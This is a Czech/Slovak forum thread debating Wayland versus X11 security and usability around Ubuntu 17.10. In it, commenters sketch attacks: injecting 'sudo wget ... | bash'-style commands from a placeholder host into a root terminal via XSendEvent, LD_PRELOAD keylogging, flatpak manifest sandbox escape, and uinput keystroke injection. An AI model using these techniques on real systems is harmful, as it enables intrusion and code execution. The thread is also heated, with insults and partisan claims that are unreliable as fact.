Ubuntu 17.10 bude ve výchozím stavu používat Wayland

Na AMD už snad nemůže nadávat nikdo soudný. Pro Linux je to kvalitou podpory jasná volba GPU…

Nemá to samé Nvidia, jen s tím rozdílem že u AMD je ta OSS část opravdu funkční driver, zatímco u Nvidie jen tupý wrapper pro blob?

A pak jsou ještě pokročilejší uživatelé, kteří chtějí, aby nemuseli OS řešit a mohli se v něm věnovat tomu, na čem vydělávají, místo aby marnili čas s nějakou DIY hardcore distribucí ;-)

Pokud nechteji system nijak upravovat, tak se dedaji povazovat za pokrocilejsi uzivatele. A pokusy upravovat Ubuntu konci velmi rychle rozpadem toho domecku z karet do stavu nepouzitelnosti.

Je vývojář jádra "pokročilý uživatel"? Je někdo, kdo pracuje na statickém analyzátoru kódu dostatečně "pokročilý"? Co takhle pentester nebo někdo, kdo se věnuje reverse-engineeringu? Je někdo, kdo je zodpovědný za několik Ubuntích balíků, snapů atd... pokročilý? Co překladatel mezi různými jazyky, co si vybudoval vlastní překladovou paměť, implementoval automatické rozpoznávání specializovaných termínů pomocí Bayesovské sítě a jejich vyhledávání na webu atd, smí se pouvažovat za "pokročilého"? A to mluvím jen o konkrétních osobách, které se mě osobně nějak týkají. Jsou prostě miliony uživatelů, kteří se na svých počítačích věnují věcem, o kterých se základnímu linuxákovi ani nezdá, a mají společné jedno: očekávají, že jim stroj bude "prostě fungovat", protože na nějaké upravování distra jednak nemají čas, a jednak - a to především - už je dávno přestalo zajímat hrát si na sysadmina. Někomu to možná připadá těžko pochopitelné, ale počítač má i jiná užití, než si konfigurovat OS anebo se učit konfigurovat OS. Někde na Youtube je nezapomenutelné video z nějaké debaty s Linusem, kde se skupina "pokročilých" linuxáků pustila do vášnivé debaty o tom, jestli je lepší xterm, rxvt anebo užnevímco, až se jeden zeptal Linuse, který z nich používá on, a Linus s úsměvem odpověděl, že neví a je mu to jedno :D

Je uplne jedno jestli je uzivatel raketovy inzenyr nebo ucetni. Jde o to jak pouziva system. Pokud programuje umelou inteligenci, ale neupravuje si system podle svyho, neni to pokrocily uzivatel...

> Nema smysl se bavit o podpore moderniho display stacku na nicem jinem nez aktualnich verzich GUI toolkitu, ktere tu navic jsou uz leta. Takze GTK 3 a QT 5 podporu ma, u legacy apps/toolkitu to nejak nevidim duvod resit, ty at klidne jedou pres Xwayland.

To je hodne oklukou povedane "dokopy nic" :)

> ale ze by zrovna Xorg problemy nemel...

A okrem toho bije cernochov...

> Otazkou je, zda neni problem spise v tve aplikaci, evidentne jsi ji na Waylandu neotestoval :)

Ale ano, otestoval. A skonstatoval som, ze Wayland potrebnu funkcionalitu (zistenie / nastavenie pozicie mysi, zistenie aktivneho okna, override_redirect flag) jednoducho nema.

> Ano nema a snad to tak i zustane )) takovehle operace nema co aplikace mit moznost delat,ta si ma maximalne hrat se svym window a nema co vedet o ostatnich apps a uz vubec ne delat veci jako manipulovat s pozici mysi. Takove veci patri do compositoru. V opacnem pripade je ten system deravy cednik na urovni Windows 95.

A tym sme sa opat dostali k tomu, ze s nami Xorg bude este mno, mnoho rokov :)

> Vazne si myslis, ze majorita uzivatelu bude chtit zustat u spatneho (a nebezpecneho) reseni jen proto, aby mohla pouzivat tvoji appku ci podobnou ?:)

Ano :)

Realita je nastastie taka, ze sa uvedenim Waylandu X nebezpecnym nestalo a az na par masochistov na Wayland sere pes. A ked sa ho podari aj napchad uzivatelom dolu krkom, v bordeli co to sposobi padnu cele distra.

Nezabudaj, ze na tej tvojej "super bezpecnej" ptakovine nebezi poriadne ani Steam.

> Takove veci patri do compositoru.

... musim sa ale spytat, ci si fakt predstavujes ze si teraz sadnem a napisem k tomu programu vlastny compozitor :D

> Nijak, proste takove aplikace nebudou a je to tak spravne.

Kto urcil ake druhy aplikacii smiem pouzivat na svojom PC? Mozno by mi to dovolil, keby som poprosil na kolenach?

--

Neprijemne je, ze rovnaky stupen kretenizmu ako tuna tnr prejavuju i vyvojary samotneho Waylandu. Na druhej strane, vzdy je tu moznost presunut sa na daky otvorenejsi OS, napriklad Windows...

> ale neni povinnost jeho autoru kompromitovat jeho bezpecnostni architekturu

Ja sice chapem tvoje nadsenie novou hrackou, ale radsej si o nej nieco nastuduj. Wayland nema bezpecnostnu architekturu, ma len veci ktore nie su mozne priamo cez protokol.

Ked uz mi raz umoznis pustit na svojom stroji kod, posledne co budem potrebovat je hybat ti mysou. Postahujem si vsetko na co tvoj uzivatel dociahne (pretoze tomu Wayland nijak nebrani) a keby som nahodou potreboval logovat klavesy, zapisem si LD_PRELOAD s do .bashrc (pretoze tomu Wayland nijak nebrani).

Z hladiska bezpecnosti Wayland nema nic, co by nevedelo X pred nim.

> A zrovna o sandboxovani apps jsou prave technologie jako flatpack ci snap...

... ktore funguju na rovnakom principe manifestov ako Androidie APK, akurat sa uzivatela radsej ani nic nepytaju. Ani jedno, ani druhe ta ziadnym sposobom neochrani pred mojou zakernou aplikaciou co tajne zneuziva svoj pristup do $HOME.

> X11:
Aplikace bezproblemu pristupuje k jakymkoliv oknum, muze odposlouchavat klavesy, pohyb mysi, ....
>
> Wayland:
> Aplikace muze manipulovat se svymi okny))

Uzasne, skvele, presvedcil si ma. Slava Waylandu, tri krat hura. /s

K comu je to dobre? Fakt si takto predstavujes "bezpacnost"?

> Takze proto, ze uzivatel muze udelat blbost, tak pro jistotu zustaneme u deraveho X11, sandboxing resit nebudeme, protoze uzivatel by nekdy mohl povolit neco, co da aplikaci vyssi prava.

Ano. Nemame ziaden dovod nedosledne chranit uzivatela pred nim samim. A ked to vies spravit dosledne, uzivatel sa ti na taky system vysere.

Sucasny system postaveny na sudo / gksudo funguje dobre. Pokial ho chce niekto rozsirit na androidie "Tato aplikacia chce pristupovat k Dokumentom, povolit", nemam v podstate nic proti, ale nepredstavuj si, ze sa tym nieco ochrani.

Ale system, ktory sa nic nespyta a jednoducho funkcnost, ktoru pouzivame dakych 50 rokov len tak odstrani, nema sancu na prezitie.

> Zcela ti ale unika napr. pouziti ve firemnim prostredi

Pravda, skutocne nevidim dovod, preco by som na mojom desktope mal byt obmedzovany planom Redhatu pre podniky.

Zagoogluj si "fedora 25 problem" a "fedora disable wayland", ciste pre tu srandu. Dostanes dost vtipne mnozstvo ludi, ktori v takom pripade prejdu, pravdepodobne k Windowsu.

> A ted si pro zmenu zkus najit seznam bugu v Xorgu :-)

Naco? Vidis niekde huf ludi utekajucich od neho k X10? :D

> Wayland naproti tomu nabizi mnohem jednodussi, elegantnejsi, navic bezpecnejsi architekturu.

Skus si niekedy napisat kompozitor, fakt sa pobavis. Normalne by som odporucal by som libwlc, aby si sa nezblaznil uplne, hlavne az sa nam podari dopatlat kod pre renderer. Ale v tomto konkretnom pripade si to urcite skus nacisto.

> Proc bych to delal, mutter mi vyhovuje :-)

Myslim, ze by si potom prestal zvastat tie neuveritelne kydy o jednoduchosti a elegancii jeho architektury. Vedel si napriklad, ze potrebujes vytvorit ~10 server-side objektov len na to, aby sa ti zobrazilo okno?

> HiDPI podpora v X11 je neskutecne mizerna, ve Waylandu funguje krasne

Zacinam mat podozrenie, ze si zivi Wayland (alebo HiDPI display) nikdy nevidel :)

> proc je X11 broken by design - kdyz musim tvorit window pro veci jako je popup menu

Tak to ta urcite potesi infomacia, ze vo Waylande popup menu vytvara nie len okno, ale naviac i xdg_popup objekt :D

A skus si pustit nieco pre X, QT alebo tak. Obzlvast xterm je strasna prdel, pretoze XWayland o DPI nad nim nic netusi, takze sa zobrazi budto priserne rozmazany alebo s velkostou postovej znamky :)

> ale nepotrebuje se pak uchylovat k vecem typu grabovani inputu (coz napr. muze zpusobovat problemy pri locku)

Ano, ano, jeden z nas Wayland nikdy nevidel, trva ale na jeho ospevovani :)

xdg_popup_grab je definovany preste podla X11, nakolko bol niekto v Gnome prilis lenivy prepisovat ich blaznive menu na nieco pricetne. A ked si nahodou kompozitor dovoli grab odmietnut, GTK aplikacia spadne, pretoze s takou moznostou proste nerata. Na druhej strane, aj keby ratala, Wayland protokol nema sposob ako jej dat o odmietnuti vediet.

Odhliadnuc od toho, ze tvoj popis Waylandu, ktory "ma tyto veci pro popup okna osetreny" nezodpoveda ani specifikacii, ani realite, nejak si do tej fantazie zamiesal i klavesove skratky, pre ktore Wayland podporu nema.

Neplac mi tu nad "osobnymi utokmi", ked uz si schopny spisat nieco taketo, a fakt si pozri aspon tu specifikaciu, nema ani 50 stran :)

> 3. Specifikaci jsem cetl, ale dekuji za starost :-)

Preco sa potom tvoja fantazia tak smutne odlysuje od reality? Ono totiz, to co popisujes ty je Wayland aky by byt mal, Wayland aky je neustale slubovany v clankoch od ludi okolo neho. Asi sme citali tie iste.

Wayland aky je v specifikacii funguje dost inak. Obzvlast pokial ide o xdg-popup a veci okolo neho.

> Jak jsi z toho vyvodil, ze Wayalnd podporuje klavesove zkratky, to me fakt zajima :-)

Citujem:

"""
Wayland:
Klavesove zkratky funguji, protoze nic jako XGrabKeyboard zde neni a neni potreba takoveho hacku, jelikoz Wayland ma tyto veci pro popup okna osetreny.
"""

Ze by schyza?

Mimochodom, Wayland ma protokol, ktorym kompozitor klientovy odovzda cele fd na vstupne zariadenie. Az sa toto zacne pouzivat, budes este nostalgicky spominat na bezproblemovy XGrabKeyboard :)

Toz som teda priznal moznost, ze som ja ten sprosty a pustil Gnome, ciste pre pripad, ze by na tom grabe v poslednej dobe nieco zmenili. Otvoril dve okna, dal pravy klik na jedno z nich, vyskocilo menu a vsetky klavesove skratky prestali fungovat. A alt-tab prepinal polozky v menu.

Veru, veru, vskutku velmi prekvapujuce. Kto by to len bol cakal.

--

Bud od tej lasky, zbal si tu svoju "realnu skusenost" a chod robit vola z niekoho ineho. Mne uz nestojis ani za ten rant.

Ad Sucasny system postaveny na sudo / gksudo funguje dobre - nefunguje. Když máte spuštěné piškvorky pod uživatelem a admin utilitu pod rootem, tak ty piškvorky mohou odečítat stisky kláves které míří do té admin utility, a dokonce jí klávesy posílat. To je dost fail.

Sandboxovane piskvorky to nevedia ani pod X.
Nesandboxovane piskvorky to zvladnu aj pod Waylandom.

Pointou je neinstalovat do systemu piskvorky, ak si nie som isty ze v nich nieje keylogger, nie sa spoliehat na to, ze ma pred logovanim uchrani neimplementovanie protokolu.

U X11 může každá aplikace číst zprávy (stisky kláves, pohyby a kliky myší) proudící celým X serverem, bez ohledu na kontext, ve kterém ta aplikace běží. Těžko mluvit o bezpečnosti, když nemáte oddělené ani procesy běžící pod různými účty. Wayland moc neznám, ale pokud vím, tak tenhle problém řeší. Mimochodem řeší ho i Win32.

Ad Pointou je neinstalovat do systemu piskvorky, ak si nie som isty ze v nich nieje keylogger - byly doby, kdy se předpokládalo, že cokoliv může přihlášený uživatel, to může i každá aplikace, kterou ten uživatel spustí. Ty jsou ale dávno pryč. Když vám totiž útočník prostřelí třeba browser nebo piškvorky, tak může posílat klávesy té admin utilitě běžící pod adminem, nebo se chovat jako keylogger.

Kdybychom měli vždycky jistotu, že aplikace neprovádějí nepravosti (ať už záměrně nebo v důsledku bezpečnostní chyby), tak by samozřejmě bylo na světě lépe. V praxi ale bohužel tuhle jistotu většinou nemáte. Jenom takový Google Chrome měl minulý rok 172 vulnerabilities.

Mimochodem pokud mám parafrázovat co jste napsal, tak absence oddělení procesů (řekněme jako v DOSu) je vlastně v pohodě, protože stačí neinstalovat aplikace, které hrabou mimo vlastní paměť :)

> Wayland moc neznám, ale pokud vím, tak tenhle problém řeší.

To nieje celkom pravda. Wayland nic neriesi, len nedefinuje ziaden protokol, ktory by to priamo umoznoval. To, ze je mozne klavesy a mys odchytavat desiatimi inymi sposobmi sa taktne prehliada.

> Mimochodem řeší ho i Win32.

Vo Windowse som schopny jak sledovat tak aj emulovat klavesy priamo cez winapi. Jedine, co je odklonene su okna UAC.

> Ty jsou ale dávno pryč. Když vám totiž útočník prostřelí třeba browser nebo piškvorky, tak může posílat klávesy té admin utilitě běžící pod adminem, nebo se chovat jako keylogger.

Ale toto nieje problem, ktory sa sa riesit okyptenym protokolu. Nejak si totiz neviem predstavit, ze si da utocnik tu namahu prestrelovat browser, len aby sa potom zastavil, pretoze nemoze posielat klavesy do cudzieho okna.

Ona je totiz cela ta predstava uplna blbost - je to zufalo napadne a ked uz bezim s pravami browseru, viem skodit podstatne zaujimavejsie.

Na druhej strane taketo obmedzenia iba otravuju uzivatelov a davaju im dobru zamienku k navratu k "staremu a osvedcenemu", kde vedia napriklad na 2 kliky poslat do pidginu screenshot.

Ad pres ten browser, ale zase od toho mame sandboxing aplikaci - jenom doplním, že MSIE a Egde běží v sandboxu. Od nějaké verze podporuje nějakou formu sandboxingu i Firefox a Chrome. Vypadá to tak, že vlastní brouzdání webu běží v procesech s nízkými právy, a tyhle procesy jsou spravované dalším procesem, který umí věci jako ukládání souborů na disk (protože bez toho nelze stahovat) atd. Jinými slovy pokud HTML engine, skript nebo plugin převezme kontrolu nad příslušným procesem, tak má díky sandboxu dále velmi omezená práva, a musí z toho sandboxu nejprve utéct. Není to magic bullet, ale rozhodně je to lepší, než situace bez sandboxu.
https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/

Ano, toto je v poriadku a znie to ako fajn pristup. Ale sudiac z toho, ze Vam prave odpovedam z Chromu na X11, Wayland k tomu nieje potrebny :)

Wayland k tomu není nutný, ale pokud jedete pod X11, tak po prostřelení správné části browseru (na X11 dost možná stačí ten sandboxovaný proces) pořád máte z prohlížečky webu keylogger a podvrhovač příkazů. Oddělení window messages je obdobou oddělení procesů, a X11 prostě z hlediska window events spojuje všechny procesy, které používají daný server. Jestli vám to nepřipadá jako problém, tak mě ano.

> pořád máte z prohlížečky webu keylogger a podvrhovač příkazů.

Ani na jedno ani na druhe nepotrebujem X11...

A ked uz sme u toho, keby toto skutocne bol rieseny problem, zakazat sanboxovanemu klientovy pouzit XTest a volat XSelectInput celkovo, alebo len na cudzie okna by bolo podstatne jednoduchsie riesenie.

Ad Vo Windowse som schopny jak sledovat tak aj emulovat klavesy priamo cez winapi. Jedine, co je odklonene su okna UAC. - ale kdepak. Můžete sice posílat window messages jiným procesům, ale funguje to jen mezi procesy se stejným nebo nižším integrity levelem. Takže ani kalkulačce puštěné pod adminem žádnou window message nepodvrhnete.

Ad taketo obmedzenia iba otravuju uzivatelov a davaju im dobru zamienku k navratu k "staremu a osvedcenemu" - to je přesně důvod, proč ve Window mohou Win32 aplikace dál posílat window messages mezi sebou, pokud nenastoupí omezení integrity levelem. Nové aplikace nemůžou posílat odposlouchávat ani podvrhovat window messages pokud vím vůbec. Místo toho používají DataTransferMa­nager, kde se aplikace musí explicitně dohodnout co chtějí posílat resp. přijímat.

A to je zaroven dovod, preco Win32 uvidite este minimalne tak dlho, ako my budeme mat X11. Napokon, Microsoft uz par systemov bez Win32 vydal a uspech medzi ludmi 2x velky nezozal :D

Inak ale toto fakt riesi maximalne marginalny problem. Co presne viem posielanim klaves do ineho okna dosiahnut? Bude moj kod len ticho cakat, dufat, ze sa niekde na ploche zazrakom objavi okno rootovskeho terminalu skor, ako uzivatel zavrie browser? Ako to okno vobec spozna? Rootovsky terminal nieje xterm pusteny ako root, je to jedno z mnoha okien procesu (nieco-)Terminal v ktorom zrovna len nahodou bezi sudo...

A to este neriesim co by sa do toho terminalu vobec malo pisat...

Ad Win32 uvidite este minimalne tak dlho, ako my budeme mat X11 - proč ne? Win32 funguje, a dá se čekat, že Win32 aplikace pojedou ještě minimálně za 10 let, i když asi v sandboxu.

Ad Ako to okno vobec spozna - přes XQueryTree projdete okna, přes XFetchName získáte názvy oken, přes XSelectInput nastavíte které události chcete přijímat. Přes XSendEvent pak můžete oknu posílat cokoliv uznáte za vhodné.
https://gist.github.com/robertklep/5124355
http://www.doctort.org/adam/nerd-notes/x11-fake-keypress-event.html

Ad co by sa do toho terminalu vobec malo pisat - třeba " sudo wget -O - http://foo.bar/bad_script > bash ; clear"? Osobně bych počkal, až na klávesnici pár minut nebude vstup. Když příkaz vyjde, tak vyjde. Když ne, tak se nic až tak zvláštního neděje.

XSendEvent oznacuje event ako "poslany cez send_event", terminal emulator take samozrejme ignoruje. To je napokon i dovod, preco s nimi nefunguje napr. xdotool.

Rozumnejsie by bolo pouzit XTest extension, ale ta nemusi byt povolena. Na masine, kde prave sedim (Manjaro bez vacsich uprav) nieje, nie som si ale isty ako je to u inych distier.

Z XFetchName netusim, ci okno do ktoreho pisem je terminal roota, terminal uzivatela, jeho menu, ikonka... Ako, viem si predstavit komplikovanejsi kod, ktory by mal aspon daku sancu trafit sa, ale...

> Když příkaz vyjde, tak vyjde. Když ne, tak se nic až tak zvláštního neděje.

... riskujem ze sa uzivatel vrati k terminalu, kde je toto viditelne zapisane v nano. Vskutku velmo nenapadne :)

Ad XSendEvent oznacuje event ako "poslany cez send_event", terminal emulator take samozrejme ignoruje - dobře tak, ale jak sám píšete, tak existují jiné cesty

Ad viem si predstavit komplikovanejsi kod, ktory by mal aspon daku sancu trafit sa - je dobré si uvědomit, že pokud se útočníkovi podaří spustit kód na větším množství desktopů, tak nepotřebuje 100% úspěšnost.

Ad riskujem ze sa uzivatel vrati k terminalu, kde je toto viditelne zapisane v nano - pak se to prostě nepovedlo :). Nicméně není problém nejprve poslat nejprve ctrl+z, a na konci dát fb. Pokud tohle není dost dobrý trik, tak se určitě najde jiný.

> dobře tak, ale jak sám píšete, tak existují jiné cesty

Ale tie ine cesty budu rovnako dobre fungovat i s Waylandom, respektive ak ich sandbox blokuje, blokuje ich nezavysle na display protokole. V tomto Wayland fakt ziadnu "bezpecnost" nepridal.

> je dobré si uvědomit, že pokud se útočníkovi podaří spustit kód na větším množství desktopů, tak nepotřebuje 100% úspěšnost.'

Ale pri vsetkych moznych kombinaciach pouziteho terminal emulatoru a X11 okien, ktore moze vyvolat (v X11 je, aspon teoreticky, kazdy UI element samostatne okno), bude takymto sposobom rad za 10% uspesnost u jedneho distra. Dokonca i distrubuovat GTA.V.ONLINE.CRAC­KED.deb by mu dalo lepsie sance.

> Nicméně není problém nejprve poslat nejprve ctrl+z, a na konci dát fb.

Je. ^Z nefunguje ani v tom nane :) Vlastne ma napada jediny textovy editor, kde ^Z funguje a aj to len z command modu :D

Plus teda, ak si takyto prikaz najde v editore, alebo hoc aj v scrollbacku niekto s pribliznou predstavou, co by jeho PC v nepritomnosti uzivatela malo robit - a priznajme si, tato sanca je pri Linuxovych uzivateloch predsalen dost nechutne vysoka - Vasa domena "foo.bar" moze byt dole skor, nez stihnete povedat "mal som 200 masin v botnete".

--

A pritom je tolko krasnych, <i>nenapadnych</i> sposobov, jak "dostat" Linuxovy desktop :)

> takze bezpecnost je pak na slusne urovni.

A pouzitelnost na nulovej.

A neochrani pred nicim, rovnako ako Wayland. Ja si ako programator zakerneho kodu samozrejme vyziadam pristup do $HOME a uzivatel mi ho samozrejme da, pretoze za a), ludia su sprosty a za b), moj zakerny kod bude prezentovat legitimny dovod na to, aby s $HOME pracoval. Napriklad bude stahovat porno.

A s pristupom do $HOME mam vsetko co potrebujem.

> Resis totalni nesmysl

Riesim tvoje sialene predstavy o fungovani realneho sveta :)

Aky poweuser, aky podnikovy laptop? Ked uzivatel nechce alebo nemoze spustat aplikacie 3 strany, je flatpack alebo wayland len celkom zbytocna vrstva chraniaca pred nicim.

Taku aplikaciu mozes ale rovnako dobre odsanboxovat firejailom (ktory si pusta vnoreny X server), a bude to pravdepodobne bezpecnejsie ako dufat, ze nebude ziaden bezpecnostny problem v compositore.

A kedze uzivatel bude chciet prehliadacom stahova a mail klientom otvarat prilohy, skor ci neskor mu ten pristup do $HOME v oboch pripadoch povoli :)

> Aneb proc pouzivat jednoduche, elegantni reseni

Pretoze chces riesit konkretny problem, nie si pridat 1086 dalsich :D

> Trosku si dostuduj informace. Existuje moznost povolit pristup k urcitym slozkam, neni nutny pristup k celemu $HOME

Pre uzivatela browseru je. Pri mail klientovy by si mozno vystacil s Documents a Desktop, ale zas na druhej strane, naburat sandbox sa cez .desktop file na ploche je celkom realna moznost.

Bezpecnost v takychto situaciach znamena zabranit, za _kazdu_ cenu a so 100% istotou, pustaniu neovereneho kod v userspace. Cokolvek mensie je len naoko, dobre len pre falosny pocit bezpecia a do marketingoveho materialu. Ako cely flatpackovany Wayland :)

> Asi bys mel nabidnout sve sluzby RH, usetris jim jiste spoustu penez, protoze jsou samozrejme idioti a nevi, proc Wayland ci flatpak vyviji a proc uz nechteji dlouhodobe podporovat Xorg :-)

Obecne sa to pripiruje ich NIH syndromu.

> Tve argumenty zcela zcestne - vicemene na urovni toho, ze jde udelat spatna bezpecnostni politika pro sandbox, tzn. na urovni toho, ze bezpecnost je spatna, protoze muzu dat heslo na uzivatele root admin

Ty si zas bezpecnost zjavne predstavujes tak, ze ked sa na vec naplaca dostatok zaplat, pri troche stastia sa uz ziadna dalsia diera neobjavi.

> A jak zajistis spusteni 100% overeneho kodu v userspace? Udelas audit celeho mail klienta? Prohlizece? Komunikatoru?

Ano. To je snad uplne samozrejme, ked sa chcem zarucit za ich bezpecnost. Alebo ich vrazim do _skutocneho_ sandboxu, nie do niecoho, co vie zapisovat do uzivatelskych zloziek a navrh ma otvoreny socket rovno do jadra uzivatelskeho prostredia.

Seriozne, kto pricetny by toto pokladal za bezpecne?

> Tvoje alternativa je to, ze se na to vykasleme, protoze to nejde, s timhle pristupem jsme mohli zustat u DOSu a jeho "permission" modelu :)

Ale kludne. Je ovela lepsie pracovat s niecim nezabezpecenym a vediet o tom, nez pouzivat paskvil o ktorom niekto vykrikoval aky je bezpecny tak dlho, ze ma celkom zblbol.

> Protoze to rika nejaky kozec ?:) Proc Xorg developeri rikaji, ze je X11 neudrzitelny?

Nie, ze by som sa nezabaval na tvojich pokusoch o ad hominem, ale tu by asi stalo za to pripomenut, ze to vravel JEDEN developer za X11. Cistou nahodou ten, co spatlal Wayland.

Vyvoj X11 pritom veselo pokracuje dalej, napokon, Wayland funguje len na jedinom z mnoha systemov, kde funguje X.

> Do uzivatelskych slozek ma pravo zapisu jen pokud mu ho nekdo nastavi v manifestu.

Ktory si samozrejme kazdy uzivatel pred instalaciou skontroluje, rovnako ako si kazdy pozera permissions na Androide :) Kolko krat si to uz urobil?

> A vyhodou je zde samozrejme design Wayland protokolu, jeho jednoduchost, moznost omezeni pristupu k ruznym interfacum, obecne nedostupnost problematickych operaci jako v X11 atd.

A ine veci, o ktorych si niekde cital a teraz ich papagajujes napriek tomu, ze vo Waylande vobec nie su.

Sorry, ale ty si ten protokol zjavne nikdy nevidel a mne sa nan uz nechce spominat. O tomto sa proste nebudeme bavit :D

> Wayland je diky systemu verzovanych rozhrani krasne rozsiritelna platforma :)

Tie verzie mimochodom vsetky momentalne pouzivane implementacie (cize GTK3 a Mutter) tvrdo ignoruju a ak verzie nesedia, konci to vacsinou segfaultom.

"Nie, ze by som sa nezabaval na tvojich pokusoch o ad hominem, ale tu by asi stalo za to pripomenut, ze to vravel JEDEN developer za X11. Cistou nahodou ten, co spatlal Wayland."

U nás to říkají všichni, kteří se hrabou v grafických ovladačích, Xorg a Waylandu. Popravdě jsem ještě nepotkal vývojáře Xorgu, který by říkal: Vykašlete se na Wayland, Xorg nám bude dál sloužit dobře. A že jich pár znám.

Ano, samozrejme. Wayland ti nijak nebrani pristupovat k datam inych procesov, iba na to neposkytuje API.

Stale dokola cosi splietas o sanboxe, ako keby ho niekto realne planoval pouzivat :) Sandboxovana aplikacie je uzivatelovy zbytocna, pokial je to cokolvek zaujimavejsie nez daky budik.

Mimochodom, ja samozrejme viem hybat mysou a posielat vstupy z klavesnice aj Waylandu, robi sa to ale "naslepo" a uzivatel tak nema napriklad moznost nechat program aby klikol na konkretnu ikonu v okne.

Keby som pisal zakerny kod, tak si za 1. vystacim s klavesnicou a za 2. pre klikanie okno maximalizujem, aby som vedel odhadnut presnu polohu ikon. Teda to len za predpokladu, ze by som musel robit nieco tak viditelne.

Ja fakt neviem, kto ti nabulikal, ze ta Wayland nejakym sposobom chrani, ale bol to bud klamar alebo idiot.

> Treba kazdy uzivatel flatpaku.

Vsetci traja? :) Mimochodom, "sanboxovanie" flatpaku sa da obist jednoducho tym, ze si v manifeste vyziadam rw pristuo k domovskemu adresaru.

> Na ChromeOS / Android / iOS to pouziva kazdy uzivatel

Na desktope ale pouzivame trochu zaujimavejsie aplikacie nez to, co uzivatel typicky pouziva na ChromeOS / Android / iOS.

> Metoda vyzaduje RW pristup k uinput, coz samozrejme normalni uzivatel nema.

Co samozrejme normalny uzivatel ma, odkedy ho zacal pouzivat Steam a Ubuntia on-screen klavesnica :) V takom Archu ti dokonca kernel automaticky natiahne modul.

> Vsichni velci vendori prosazuji nejakou formu sandboxingu

Menuj troch.

> Kolik % uzivatelu ma Steam Controller

Pisem Steam, nie Steam Controller.

> Default v Archu:


[tom@silver ~]$ ls -l /dev/uinput
ls: cannot access '/dev/uinput': No such file or directory
[tom@silver ~]$ lsmod |grep uinput
[tom@silver ~]$ python2
Python 2.7.13 (default, Jul 2 2017, 22:24:59)
[GCC 7.1.1 20170621] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from uinput import Keyboard, Keys
>>> k = Keyboard("hi Wayland!")
>>> k.pressEvent([21])
>>> yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyyyyyyy­yyyyyyyy
KeyboardInterrupt
>>>
[tom@silver ~]$ ls -l /dev/uinput
crw-rw---- 1 root root 10, 223 Aug 6 11:23 /dev/uinput

To bol mimochodom python v xterme pod westonom. Mam za to, ze to sposobuje SystemD, nakolko moje Manjaro s OpenRC tento zlepsovak nema.

Moze, musis si ale napisat vlastny compositor. A to si ani nerobim prdel...

Samozrejme, problem vznikne, ak budes potrebovat napriklad mapper pre gamepad, OBS na nahravanie obrazu a teamviewer naraz, pretoze dva rozne kompozitory naraz asi nespustis :)

To bych netvrdil. Wayland ale umí méně než X11 (neumí například vzdálený přístup), podle všeho vyžaduje i úpravy aplikací (za všechny třeba KDE - čekal bych plnou zpětnou kompatibilitu, nebo alespoň že stačí přelinkovat na novou verzi frameworku), a oproti konkurenci (MS WPF/Direct2D, Apple Core Graphics) řeší jen malou část problematiky. Pokud se ukáže, že Wayland "1" je nedostatečný, tak se bohužel dá předpokládat přesně ten chaos, který jsem popisoval na základě zkušenosti s náhradou X11.

Ad Wayland nema primy ekvivalent ve Windows - ono je to přesně opačně. Apple Core Graphics ani WPF/Direct 2D nemá na Linuxu ekvivalent. Problematika grafického výstupu se řešila původně pomocí X11 a klientské knihovny. Protože psát pomocí X11lib bylo jen pro otrlé, postupně vznikly X Toolkit, Athena, Motif, XView, recentněji GTK, Qt, GTK+ a další. A protože je potřeba řešit i 2D grafiku a její tisk, vznikly knihovny jako Cairo, které na jedné straně poskytují API pro 2D kreslení, a na druhé straně mají výstup pro Xlib, XCB, OpenGL, blitz, DirectFB, PDF, PS atd.

Nevím jestli tomuhle říkáte "otevřený design", ale rozhodně tomu neříkejte "architektura", protože ta to rozhodně není. Všechno se implementuje na deset způsobů, zpravidla polovičatě a přes ruku, a výsledkem je guláš. Nahrazení X11 něčím rozumným bylo jedinečnou možností ten bordel uklidit. Bohužel se to nepovedlo. Jenom se jeden střípek z mozaiky vyjmul, a nahradil jiným, s tím že kde nepasuje, tam se pracuje okolo něj.

Ad Zpetna kompatibilita zde je, to je prave Xwayland - kdyby to opravdu fungovalo, tak není jediný důvod měnit cokoliv na straně aplikací. Máte systém s Waylandem, nové aplikace jedou přes Wayland, staré přes X11, a všechno na 100% funguje. Jenže ono to tak moc nefunguje, že?

Ad jen velmi malo aplikaci je psano primo vuci X11, ale typicky vuci nejakemu toolkitu (GTK, QT), tudiz u spousty pripadu staci jen podpora v toolkitu a neni nutny prepis aplikace - to ve Windows podobné, akorát to tam opravdu funguje. Aplikace psané pro GDI(+) prostě fungují dál i po zavedení WPF+Direct2D. Změnily se akorát vnitřnosti API, a to vývojáře nemusí trápit.

Ad co se tyka vzdaleneho pristupu, to je nepochopeni Waylandu, Wayland je display protokol, tudiz tyto veci resit nemusi, ty se mohou resit na aplikacni (resp. compositorove) urovni - jenže Wayland je náhrada X11. Pokud něco nahrazujete, tak by nová věc měla umět minimálně tolik, co ta stará. Ne že se přejde na Wayland, a pak se léta bude řešit, co se vzdáleným přístupem. Pokud jde o možná řešení, tak to vypadá "tradičně": viděl jsem těch řešení nastíněných víc, vyvíjejí se paralelně a bez jakékoliv koordinace, to samé se řeší vícekrát různými způsoby. Třeba to jednou někdo dotáhne do konce. A když budete mít veliké štěstí, tak výsledek bude umět předávat na zobrazující stranu primitiva (informace jak obraz poskládat), a ne grabnutý obrázek. Akorát díky absenci rozumné architektury nějak nevím, jak by to chtěli pánové udělat.

Když to shrnu, tak od doby Unix Wars se Unixy jako platforma rozvíjejí chaoticky a bez jakékoliv koncepce. Na Linuxu to pak dosahuje vrcholu. Většina problémů dnešních Linuxu není způsobená zlým MS nebo zlými výrobci HW. Je způsobená chaotickým vývojem bez jakéhokoliv konceptu, který připomíná pejska a kočičku, když vařili dort. Kdo může za to, že Wayland v době uvádění do dister nemá vyřešený vzdálený přístup? Nedostatečná koordinace, absence jasné architektury. Kdo může za to, že snad každá aplikace má jiné widgety, a mezi aplikacemi se liší i rendrování fontů? Nedostatečná koordinace, absence jasné architektury. Totéž u SNAFU ohledně ALSA/PulseAudio, atd. atd. Je to důvod naprosté většiny problémů, a těch je ve světě Linuxu velká spousta (vyzdvihnul bych obrovské počty regresí v kernelu):
https://itvision.altervista.org/why.linux.is.not.ready.for.the.desktop.current.html

